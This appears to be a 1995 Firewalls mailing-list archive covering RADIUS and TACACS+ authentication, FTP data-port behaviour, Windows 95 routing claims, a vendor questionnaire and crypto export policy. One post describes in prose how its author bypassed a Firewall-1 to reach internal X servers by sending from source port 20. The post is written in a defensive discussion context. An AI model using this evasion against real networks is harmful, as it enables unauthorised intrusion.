UnixWare. The Livingstons and the UnixWare can talk > Radius, but NetWare Connect uses its own proprietary protocol (hey, > I just work here, I don't have power over these decisions). Anyway, > we decided to go with Enigma Logic because it supports Radius, > Tacacs, and NetWare Connect protocols, and gives you the choice of > Ansi 909 (I think that's the number) and DES-MultiSync based > challenge-response authentication, or an S/Key-like calculated > password. > > On the client end, you get the choice of using their SoftToken > Window/Mac/Unix software, a hand-held authenticator, or an > S/Key-style cheat-sheet (for the calculated password stuff only). > > You can contact them at 510-827-570. > > Christopher J. Calabrese > Network Security Architect > Novell Information Services & Technology, Florham Park, NJ > cjc@novell.com On Tue, 3 Oct 1995, Paul Krumviede wrote: > At least in theory, a RADIUS server can cause a terminal server to > send a challenge to the calling device, and relay the response back > to the server. > > The problem is that the PPP stack that gets the challenge won't know > how to do PGP signatures. So you can send the challenge to the PC, > you just can't get it do respond with anything you want. > > You might want to consider another PPP authentication mechanism, > or something that would require stronger authentication before you > give the caller any access rights to any end systems. > > Of course, one could also hack the stack (if you have access to the > source for it). > > -Paul Krumviede > MCI Bruno MAMER suggested I search his firewall archive, which contains his "picks" of firewalls, and was a URL I've now bookmarked: http://www.crpht.lu/CNS/html/PubServ/Security/Firewall/fw-mail-sum.html On Fri, 6 Oct 1995, Carl Rigney wrote: > RADIUS does support challenge-response; the RADIUS 1.16 server has a hook > for challenge-response but would need to be modified slightly depending on ju > what kind of challenge and response are used. The PortMaster already support > its end of things. > The way it would work is that a user would enter his username and a > password (which could be a dummy if desired), the PortMaster encrypts > the password and sends that and the username to the RADIUS Server, > which can send back a reject, an accept (with all the info needed to > provide service to the user), OR the RADIUS server can send back an > access-challenge with a string that is displayed to the user, the user > enters his response (up to 16 characters) and that response is > encrypted and sent back to the RADIUS server, which can reject, accept > or challenge again. > > -- > Carl Rigney > RADIUS Liason > Livingston Enterprises > cdr@livingston.com [I think the 16 character limit will be a problem for a PGP signed response] David Carrel thru Peter Elford as part of a separate conversation said: > Now there are ways the user can get their PGP authentication. If they > login to the exec and then run PPP, they can do it with no modifications > needed from cisco. The exec login will print ANYTHING the TACACS+ server > tells it to. So they can send the challenge and have the user send their > response, and let the TACACS+ server verify. They will need to make > modifications to their TACACS+ server. They should probably configure PPP > to require no authentication if the user already logged into an exec. > (Make the first AAA method be "if-needed".). Thanks to everyone for their input. I have not heard from anyone who has implemented PGP authentication using an Annex terminal server - if there is anyone doing this, I'd love to know how its working. Kent Fitch Ph: +61 6 276 6711 ITSB CSIRO Canberra Australia kent.fitch@its.csiro.au "Our lives are frittered away by detail...simplify, simplify" - HD Thoreau From firewalls-owner Wed Oct 11 19:00:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA20664 for firewalls-outgoing; Wed, 11 Oct 1995 18:58:46 -0700 Received: from ucsu.colorado.edu (ucsu.Colorado.EDU [128.138.129.83]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA20656 for ; Wed, 11 Oct 1995 18:58:41 -0700 Received: (from sieber@localhost) by ucsu.colorado.edu (8.6.12/8.6.12/CNS-3.6) id TAA00528; Wed, 11 Oct 1995 19:56:43 -0600 Date: Wed, 11 Oct 1995 19:56:40 -0600 (MDT) From: chris sieber To: firewalls@greatcircle.com Subject: campus firewall survey Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know I have already contacted a few of you, but if there are any university network administrators interested... My name is Chris Sieber and I am a graduate student in Telecommunications at the University of Colorado, Boulder. I am currently getting my thesis underway in firewall security for the campus environment and would like to know if you as a campus administrator would like to participate in a survey as part of my reasearch. I will keep my queries to simple e-mail surveys that should only require a few answers. I will be sending them out intermittently over the next few months and i will try not to ask any sensitive information( let me know if I do). This research will be used solely for my project. I will be more than happy to share all results. Thanks for your time,please e-mail me directly if you have any questions. Chris Sieber sieber@ucsu.colorado.edu From firewalls-owner Wed Oct 11 20:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA21997 for firewalls-outgoing; Wed, 11 Oct 1995 19:48:02 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id TAA21990 for ; Wed, 11 Oct 1995 19:47:58 -0700 Date: Wed, 11 Oct 1995 22:46:06 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951011224606.2105dcc6@hobbes.orl.mmc.com> Subject: Microsoft FTP wierd Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robert rites: >FTP.microsoft.com initiates all data port connections from random, >high-numbered TCP ports, instead of the RFC-mandated port 20. This apparently >was intentional- there's a registry setting called "EnablePortAttack" that, >when turned on, will cause the server to initiate connections from 20 again. Suspect this may also be fairly recent. Until about a month ago I was able to connect to ftp.microsoft.com without problem but lately it has been hanging. Suspect this is the problem since the firewall is set to "paranoid". Warmly, Padgett From firewalls-owner Wed Oct 11 20:15:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA21931 for firewalls-outgoing; Wed, 11 Oct 1995 19:45:36 -0700 Received: from muturl.planet-int.net (muturl.planet-int.net [204.101.206.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA21924 for ; Wed, 11 Oct 1995 19:45:29 -0700 Received: (from yg@localhost) by muturl.planet-int.net (8.6.9/8.6.9) id WAA01204; Wed, 11 Oct 1995 22:46:39 -0400 Date: Wed, 11 Oct 1995 22:46:39 -0400 From: Yannick Gravel Subject: First and last subnet ??? To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi Net&Sys Security poeples, Something that everybody is talking about, but not everybody is saying the same thing about subnetting: Yes, everybody agree that we lose the first and last host of each subnet for net.iding and broadcasting. But, some are saying that I can use all subnet; but others are saying that we lose the first and last subnet... Whom truth is true.. Thanks.. Yannick Gravel System administrator -- yannick.gravel@planet-int.net From firewalls-owner Wed Oct 11 20:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA22636 for firewalls-outgoing; Wed, 11 Oct 1995 20:28:11 -0700 Received: from mail.crl.com (mail.crl.com [165.113.1.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id UAA22629 for ; Wed, 11 Oct 1995 20:28:08 -0700 Received: from crl11.crl.com by mail.crl.com with SMTP id AA05113 (5.65c/IDA-1.5 for ); Wed, 11 Oct 1995 20:25:37 -0700 Received: by crl11.crl.com id AA13764 (5.65c/IDA-1.5 for Firewalls@GreatCircle.COM); Wed, 11 Oct 1995 20:18:53 -0700 Date: Wed, 11 Oct 1995 20:18:52 -0700 (PDT) From: Tim Keanini To: Firewalls@GreatCircle.COM Subject: 'route' and WIN95 Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just for the record. If you site has a firewall and you have people internally that use a modem pool to get to PPP account using Windows 95....ummmm....you better hope you have set in policy the rules on modem use. Windows 95 will route between the ether and the serial so bye bye firewall. I have not seen anyone as of yet post this to the list so I just thought I would toss it out there for the record. There are other IP stacks that route so this is nothing new. This is clearly a policy issue and should be handled that way. --blast From firewalls-owner Wed Oct 11 21:13:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA24421 for firewalls-outgoing; Wed, 11 Oct 1995 21:07:09 -0700 Received: from narq.avian.org (wet-string.avian.org [199.103.168.126]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA24407 for ; Wed, 11 Oct 1995 21:07:04 -0700 Received: (from hobbit@localhost) by narq.avian.org (8.6.12/_H*) id XAA04272; Wed, 11 Oct 1995 23:02:43 -0400 Date: Wed, 11 Oct 1995 23:02:43 -0400 From: *Hobbit* Message-Id: <199510120302.XAA04272@narq.avian.org> To: firewalls@greatcircle.com Subject: ftp-attack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Aha, so *that's* why the FTP server is suddenly getting hammered for that one file this evening...] I never quite understood why the spec wanted the back-connections to come from port 20 in the first place, or for that matter why the *server* was supposed to initiate back to the *client* at all. It's BROKEN, and the aforementioned whitepaper goes deeper into just why it's broken. For the server to come from a high random port doesn't invalidate the "attack", though, since there are plenty of things doable by ftp-bouncing that don't rely on coming from 20. EnablePortAttack, eh? This is in NT?? Is there any more info about the setting in a manual? Did Microsnot hack this in after reading the paper, and is there a check in the mail for giving them the idea? A quick look at ftp.billgates.com shows me that they implemented most of the full PORT command checking, i.e. only letting you PORT back to > 1024 on your own machine. Does twiddling the setting also disable the client-address checking?? [Gee, wonder if NT-ftpd is a warmed-over WU?] They *are*, however, still allowing client connects FROM any port including 20. By the way, that filtering rule is utter bunkum if an attacker binds to port 20 on his end to explore your network. A few nights ago I was able to hop a Firewall-1 and tickle some X servers "inside" by doing precisely that, because someone naively assumed that everything from port 20 is a harmless ftp-data connection. What to do about it? Hard problem, partially addressed by proxies and passive mode, having the occasional data connection fail, or just punting and using some other protocol. _H* From firewalls-owner Thu Oct 12 00:04:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA27359 for firewalls-outgoing; Wed, 11 Oct 1995 23:55:18 -0700 Received: from news.infoexpress.com (news.infoexpress.com [198.151.234.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA27351 for ; Wed, 11 Oct 1995 23:55:16 -0700 Received: from ix.infoexpress.com by news.infoexpress.com (InfoExpress mail) id XAA02277; Wed, 11 Oct 1995 23:50:55 -0700 Received: by ix.infoexpress.com (InfoManager Mail) id XAA00495; Wed, 11 Oct 1995 23:32:57 -0700 Message-Id: <199510120632.XAA00495@ix.infoexpress.com> From: Todd Nakano To: firewalls-digest@GreatCircle.COM Cc: todd@infoexpress.net Date: Wed, 11 Oct 95 23:32:56 -0700 Subject: Question about firewall e-mail and news groups Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I was wondering if someone could recommend any e-mail or news groups to post information about our new product which provides remote Windows TCP/IP access through firewalls. Thanks, Todd Nakano InfoExpress, Inc. 415/969-9609 todd@infoexpress.net From firewalls-owner Thu Oct 12 00:13:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA27700 for firewalls-outgoing; Thu, 12 Oct 1995 00:08:21 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA27693 for ; Thu, 12 Oct 1995 00:08:18 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id AAA05665; Thu, 12 Oct 1995 00:06:16 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma005663; Thu Oct 12 00:06:13 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id AAA03109; Thu, 12 Oct 1995 00:03:19 -0700 From: Brian Murrell Message-Id: <199510120703.AAA03109@mocha.bctel.net> Subject: Re: 'route' and WIN95 To: blast@crl.com (Tim Keanini) Date: Thu, 12 Oct 1995 00:03:18 -0700 (PDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Tim Keanini" at Oct 11, 95 08:18:52 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1175 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk As enscripted by Tim Keanini: > Just for the record. > If you site has a firewall and you have people internally that use a > modem pool to get to PPP account using Windows 95....ummmm....you better > hope you have set in policy the rules on modem use. > > Windows 95 will route between the ether and the serial so bye bye > firewall. NOT!! From what authority did you get this information, or is it rumour and FUD?? If you got your information from some{one|thing|where} authoritative you'd know that Windows 95 WILL NOT route between ANY two interfaces in the box. > I have not seen anyone as of yet post this to the list so I just thought > I would toss it out there for the record. The reason you haven't seen it yet is because it doesn't. > There are other IP stacks that > route so this is nothing new. This is clearly a policy issue and should > be handled that way. True on both accounts. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Thu Oct 12 01:13:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA28840 for firewalls-outgoing; Thu, 12 Oct 1995 01:03:55 -0700 Received: from mail.swip.net (mail.swip.net [192.71.180.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA28830 for ; Thu, 12 Oct 1995 01:03:51 -0700 Received: by mail.swip.net with UUCP (8.6.8/3.01) id JAA05876; Thu, 12 Oct 1995 09:09:01 +0100 Received: from lda.leissner.se by lda.leissner.se id aa13469; 12 Oct 95 8:58 SNT X-Sender: pol@lda X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit Date: Thu, 12 Oct 1995 08:58:50 +0200 To: Brian Murrell From: Peter Olsson Subject: Re: 'route' and WIN95 Cc: Firewalls@greatcircle.com Message-ID: <9510120858.aa13469@lda.leissner.se> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 00:03 1995-10-12 -0700, you wrote in Firewalls@greatcircle.com: >As enscripted by Tim Keanini: >> Windows 95 will route between the ether and the serial so bye bye >> firewall. > >NOT!! From what authority did you get this information, or is it rumour and >FUD?? If you got your information from some{one|thing|where} authoritative >you'd know that Windows 95 WILL NOT route between ANY two interfaces in >the box. Yes it will, at least in build 490. I tried it successfully in build 490, routing ip-traffic from ethernet to isdn and reverse. I tried it once in release, but the other end of the isdn was not properly configured, so I didn't get it to work and I had no time to change the configuration. Could be that it doesn't work at all in release, but what strange reason would Microsoft have to include this functionality in build 490 and then remove it in release??? I would really like to know why (almost) everyone is talking about it not being possible, is this something Microsoft has stated or is it some global rumour? If anyone has any ideas on this topic, I am very interested. Please cc me directly as I don't follow this mailing list. ----------------------------------------------------------------- Peter Olsson Email: pol@leissner.se Leissner Data AB Telnr: 0520 - 490 511 direkt Box 912 Telnr: 0520 - 200 00 v{xel 461 29 TROLLH[TTAN Faxnr: 0520 - 200 89 From firewalls-owner Thu Oct 12 01:30:37 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA28601 for firewalls-outgoing; Thu, 12 Oct 1995 00:45:08 -0700 Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA28592 for ; Thu, 12 Oct 1995 00:45:04 -0700 From: gblolmxb@ibmmail.com Message-Id: <199510120745.AAA28592@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 2812; Thu, 12 Oct 95 03:43:06 EDT Date: Thu, 12 Oct 1995 03:46:21 EDT To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Firewall Questionnaire Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking at possible commercial firewall products as my employer may be getting a direct Internet connection soon. In order to help the selection process, I have sent a list of questions to several manufactures and suppliers, which I list below, does anyone think Ive missed anything out? It is expected that XXXXX would want to offer the following services to its employees: WWW access, FTP gets, outward bound Telnet, feed for an internal Newsgroup server. Please note that electronic mail (SMTP) is not desired - this is fulfilled via other channels. This raises the issue of a DNS - this has not yet been resolved, XXXX may look to the Internet Provider to supply this service. QUESTIONNAIRE 1. Would you describe your product as a: a. A circuit firewall? b. An application firewall? c. A hybrid of the above? d. Something else (please elaborate)? 2. Is your firewall a: a. Software only solution? b. A hardware and software solution? c. Something else (please elaborate)? 3. On what hardware platform does your firewall run on? 4. What operating system does your firewall run on? 5. What physical network topology does the hardware support: a. Ethernet? b. Token ring? c. Something else (please elaborate)? 6. How is the firewall managed/configured? (e.g. by use of telnet, serial port etc.) 7. What sort of user interface is used to manage the firewall? XXXXX would want to deny access to many of the TCP and UDP protocol suite at the router using packet filtering. If this were not possible, the following protocols should be denied access by the firewall. Please indicate, for each protocol, whether this is possible, and whether the firewall itself will respond to them (e.g. incoming Telnet). 8. ICMP 9. RIP. 10. SMTP. 11. Incoming Telnet. 12. All incoming RPC type protocols (NFS, NIS) 13. TFTP. 14. FTP (incoming). 15. all 'r' commands. 16. MBone and other IP over IP protocols. 17 X11. 18. is a 'sanitised' version of finger supported? 19. Is there a proxy service for FTP? 20 Is there a proxy service for Telnet? 21. Is there a proxy service for NNTP? 22. Is there a proxy service for HTTP? 23. What sort of bandwidth of Internet connection can your firewall handle? 24. How many concurrent IP circuits can your product handle? 25. XXXX operates on a commercial basis internally, and may wish to charge departments and users for their usage. Does you product have this facility built-in? 26. How does your product react to potential security breaches? 27. Does your Firewall assist in preventing outward bound misuse? 28. Do you offer security consultancy? If so, at what cost? 29. Do you have any reference sites whom XXXX may contact in the future? 30. What would a suitable solution cost, assuming a 64Kbps leased line connection? What sort of maintenance and support is offered and at what cost? 31. Do you have any independent evaluations (e.g. Magazine review) of your product? 32. Is there anything else you wish to tell us about your firewall product(s)? Mark. From firewalls-owner Thu Oct 12 03:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA01118 for firewalls-outgoing; Thu, 12 Oct 1995 02:46:12 -0700 Received: from emvax1.mainz.dk (EMVAX1.MAINZ.DK [193.89.24.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA01111 for ; Thu, 12 Oct 1995 02:46:00 -0700 Date: Thu, 12 Oct 1995 10:42:00 +0100 (MET) Date-warning: Date header was inserted by MAINZ.DK From: Kim Wohlert Subject: Re: Windoze NT C2 ? To: "A. Padgett Peterson, P.E. Information Security" Cc: Firewalls@GreatCircle.COM Message-id: <01HWCLXGWHKY0001TC@MAINZ.DK> MIME-version: 1.0 X-Mailer: Windows Eudora Light Version 1.5.2 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "A. Padgett Peterson, P.E. Information Security" >Date: Wed, 11 Oct 1995 17:25:08 -0400 (EDT) >Subject: Windoze NT C2 ? > >Kim rites: >>I most correct you here. Both of the above Compaqs come with a network >>interface card built in, so no configuration is possible without a card. >>Thus I would assume the C2 certification covers that. > >Marketeers thrive on assunptions. To quote: "These are designated as file >servers but were evaluated only for use as stand-alone workstations with no >networking capability." Is that explicit enough ? > Thanks for your reply. Where is that quote from? When I first saw it, I read it as a comment from the poster, not a statement of fact. And I am not a marketeer (any more than any other consultant who sells his/her services). Regards Kim =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Kim Wohlert |Internet:Kim.Wohlert@mainz.dk erik mainz a/s |X.400: c=DK a=DK400 p=Minerva Dortheavej 7 |o=mainz s=Wohlert g=Kim DK-2400 Copenhagen |Phone: +45 38 34 77 88 Denmark |Fax: +45 31 19 16 25 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- I guess sometimes there just aren't enough stones to throw. -Forest Gump From firewalls-owner Thu Oct 12 04:13:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02498 for firewalls-outgoing; Thu, 12 Oct 1995 04:00:09 -0700 Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA02441 for ; Thu, 12 Oct 1995 03:59:59 -0700 Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Thu, 12 Oct 1995 11:57:35 +0100 Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <307CFAA0@smtpgty.saicuk.co.uk>; Thu, 12 Oct 95 11:23:12 GMT From: "Johnson-Bryden, Ian" To: "'firewalls@greatcircle.com'" Subject: Re: International Encryption Protocols (RC2) or (IDEA) Date: Thu, 12 Oct 95 11:46:00 GMT Message-ID: <307CFAA0@smtpgty.saicuk.co.uk> Encoding: 121 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Adam Shostack wrote: Ian J-B wrote: > While Ian is substantially correct about the actions of >governments, there are two points that he does not address. The first >is that governments are subject to lobbying, the second is that most >companies probably do not plan to wait six months to hear Washington >or Brussels dictate their information security plans; they have real >needs today that they should be planning to meet. > Governments are subject to lobbying. Most of the governments >that make the laws that cover most of the internet are, to one extent >or another, answerable to the people, and do try to seek professional >advice before making decisions. AAs most of us are aware, building >strong information infrastructure requires strong cryptography; its >like using concrete for highways. Governments will need to make >allowances for this for the Information Superhighway to be built. >(Just today, another article on Internet insecurities was on the front >page of the New York Times. This is no longer a small issue.) > You have needs now; odds are good that those needs do not >include Clipper. From the point of view of building a secure network, >or offering secure services, Clipper and its relatives are a single >point of failure outside of your control. The government employees >who own the database don't answer to you. They are corruptable, and >for a small price. Aldrich Ames cost three million dollars. Could >you buy the Clipper database for less? How much could you steal if >all data moving in the > There is a large amount of fear, uncertainty, and doubt about >cryptography's future. My advice is to build systems based on todays >laws, and not on what the future may hold, if no one speaks up to >oppose it. Clipper has died an ignoble death in the US, it is fair to >assume its relatives will do the same in Europe. Adam makes some very valid points. Most governments consult individuals and corporations before drafting/changing legislation. How they select those contributors can be flawed, and some that are contacted fail to respond. Several of us have also served, and do serve. on a variety of working parties which are set up or sponsored by governments, 'standards' bodies and international organisations. The work of these contributors generally benefits all of us but may not represent all views, or be free of vested interests. The only way to influence legislation is to lobby political representatives, government officials and government executives but remarkably few individuals and corporations take the time to do that. Most prefer to complain bitterly that their particular government failed to take full account of their particular interests. Of course they would complain even louder if taxes increased dramatically because their government embarked on a development programme to build a better crystal ball. I would never advocate postponing a procurement decision in the *hope* that something better might arrive in a few months and legislation usually takes rather longer anyway. However, I would suggest that it is wise to look carefully at all options before making that decision, after carefully building an enterprise and risk policy suite so that you know what and why you want to do something and can express your needs clearly to vendors. That also greatly helps in the process of evaluating the responses. We also suffer from the changing circumstances. Major changes in international relations have coincided with dramatic growth in the availability and use of Information Super Highways. Thats had at least two effects. NATO and friendly powers built a set of rules to address issues raised by the Communist Block countries and the computer and communications technologies of the 1960's and 70's and did not need to address commercial interests in ISHs because that environment did not exist internationally as it does today. During this period of international tension a set of needs, organisations and vendor groups established and developed risk management in watertight compartments. What made sense then does not necessarily make sense today and risk management was largely built around government data classification systems. Today demand for data risk management is increasing more rapidly than the supply of *skilled* risk professionals and many of those professionals who are available have difficulty in making the transition from the defined military/intelligence environment to the commercial environment. In this new world, demand is creating the opportunities for 'cowboy' vendors to make the wildest claims without sanction, FUD abounds, legislation lags behind technology and there are a number of government organisations looking for a new home and purpose. Aint life a bitch. Over the coming months there will probably be two developments. Major government policy reviews will complete in several areas, including the European Union. Previously, governments have been concerned primarily with the crime aspects of encryption and the fear that organised crime could use ISH environments in a number of ways, particularly as a communications system which is better that that used by police services. As with any intelligence organisation, a police service has to get inside the decision loop of the enemy and unlike a military unit does not have the means to drop 500Kg smart bombs from 17,000 feet onto the enemy command and control network. They have always relied on being able to 'tap' mail and phone communications, with or without a court order. Email threatens that ability because of volume and multiple routing options and could defeat it through the use of encryption. That could enable the criminal to get inside the police decision loop. For that reason, and a few others, governments have sought to control the use of encryption but have the challenge of how they do that outside their national boundaries. What is now happening is that other government organisations are coming to understand that this policy can have damaging consequences for the economics of commerce and national treasuries. This is generating the pressure to review encryption policies and in some cases this is being done as a high priority (of course a high priority for governments may not produce results that fast). So far much lobbying has been done on the security services side of government but better results may be produced by lobbying the financial and commercial arms of government. The other area of development is on the commercial and technical side of encryption. Today there are many encryption systems and standards. Some of these are not particularly good and, outside government, are single level system high approaches. There will be some major shake outs and its anyone's guess what the result will be or how long the process will take. In part its all bound into the current restrictions on import and export imposed by the US Federal Government in whose territory many of the products originate. Whatever a user adopts today may become obsolete tomorrow, but then so does much of the information technology, so it is important to accept that today's 'quick fix' may have a short life and introduce high overheads. Ian J-B From firewalls-owner Thu Oct 12 05:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA03420 for firewalls-outgoing; Thu, 12 Oct 1995 04:58:11 -0700 Received: from mail1.digital.com (mail1.digital.com [204.123.2.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA03413 for ; Thu, 12 Oct 1995 04:58:08 -0700 Received: from ilosrv.ilo.dec.com by mail1.digital.com; (5.65 EXP 4/12/95 for V3.2/1.0/WV) id AA09394; Thu, 12 Oct 1995 04:46:53 -0700 Received: from ilofrs.ilo.dec.com by ilosrv.ilo.dec.com; (5.65/1.1.8.2/12Nov94-8.2MPM) id AA01247; Thu, 12 Oct 1995 12:46:49 +0100 Received: by fwsrtr.fws.ilo.dec.com; (5.65/1.3/10May95) id AA24101; Thu, 12 Oct 1995 12:47:53 +0100 Received: from localhost by philby.fws.ilo.dec.com; (5.65/1.1.8.2/31Aug95-8.2MPM) id AA03178; Thu, 12 Oct 1995 12:45:59 +0100 Message-Id: <9510121145.AA03178@philby.fws.ilo.dec.com> To: firewalls@greatcircle.com (Firewalls Mailing List) Cc: fod@fws.ilo.dec.com Subject: Re: International Encryption Protocols In-Reply-To: Your message of "Wed, 11 Oct 1995 18:30:23 EDT." <199510112230.SAA16369@thor.cs.umass.edu> X-Mailer: exmh version 1.4.1 7/21/94 Date: Thu, 12 Oct 1995 12:45:52 +0100 From: "Frank O'Dwyer" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Ted Doty writes: > > Certainly the signatory countries to the CoCom treaty all enforce similar > > export controls to those enforced by the USA. Therefore, do not go looking > > to purchase cryptography in the UK for use outside the UK. > > I think this is misleading. CoCom, the Coordinating Committee for > Multilateral Export Controls, amounted to a non-proliferation pact to > prevent the spread of supercomputers and other hot potatoes beyond the > club of countries to untrusted (non-CoCom) countries. As far as I can tell it > did not erect export barriers _between member countries_, except perhaps some > ordinary red tape. After all, if the CoCom countries _weren't_ willing to sell each other crypto equipment, how could they spy on one another? :-) Cheers, Frank O'Dwyer (Actually the :-) may not be necessary - I believe there was a story in the news recently about the UK 'authorities' snooping on Irish official traffic carried on UK-supplied equipment.) From firewalls-owner Thu Oct 12 06:00:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA04366 for firewalls-outgoing; Thu, 12 Oct 1995 05:47:48 -0700 Received: from dublin.iona.ie (class.dublin.iona.ie [192.122.221.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA04331 for ; Thu, 12 Oct 1995 05:46:54 -0700 Received: from destructor.dublin.iona.ie (destructor [192.122.221.18]) by dublin.iona.ie (8.6.11/8.6-jm) with ESMTP id NAA27840; Thu, 12 Oct 1995 13:44:24 +0100 Received: from destructor (localhost [127.0.0.1]) by destructor.dublin.iona.ie (8.6.11/8.6.9) with ESMTP id NAA24535; Thu, 12 Oct 1995 13:44:21 +0100 Message-Id: <199510121244.NAA24535@destructor.dublin.iona.ie> To: "Frank O'Dwyer" cc: firewalls@greatcircle.com (Firewalls Mailing List) Subject: Re: International Encryption Protocols In-reply-to: <9510121145.AA03178@philby.fws.ilo.dec.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-ID: <24532.813501779.1@destructor> Date: Thu, 12 Oct 1995 13:43:00 +0100 From: Justin Mason Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Frank O'Dwyer sez: >After all, if the CoCom countries _weren't_ willing to sell each other >crypto equipment, how could they spy on one another? :-) > >(Actually the :-) may not be necessary - I believe there was a story > in the news recently about the UK 'authorities' snooping on Irish > official traffic carried on UK-supplied equipment.) Almost right -- it was the UK surveillance service (GCHQ) snooping on Irish official traffic carried on US-supplied crypto equipment. Apparently, the equipment in question had a "back door", courtesy of the NSA; when GCHQ found out that the Irish govt were using this equipment, they had only to ask their NSA pals for the details. I only heard the details myself via a popular-science program on crypto ;), so the so-called back door may not have been a deliberately weakened algorithm, it may have been a set of keys from an key-escrow repository or some such. --j. From firewalls-owner Thu Oct 12 07:00:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA05609 for firewalls-outgoing; Thu, 12 Oct 1995 06:56:30 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA05602 for ; Thu, 12 Oct 1995 06:56:27 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id IAA00405 for ; Thu, 12 Oct 1995 08:48:51 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma000401; Thu Oct 12 08:48:44 1995 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA23074 (5.67b/IDA-1.5 for ); Thu, 12 Oct 1995 08:59:34 -0500 Date: Thu, 12 Oct 1995 08:59:34 -0500 From: Ken Hardy Message-Id: <199510121359.AA23074@ignatz.bridge.com> To: firewalls@greatcircle.com Subject: Re: NT FTP weirdness Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >FTP.microsoft.com initiates all data port connections from random, ... >Since ftp.microsoft.com's FTP-data connections weren't coming from port >20, they weren't allowed in. Fine, let M$ redefine the standards, as is their wont, until nobody can connect to them. Maybe if we all ignore them, they'll just go away. -KH From firewalls-owner Thu Oct 12 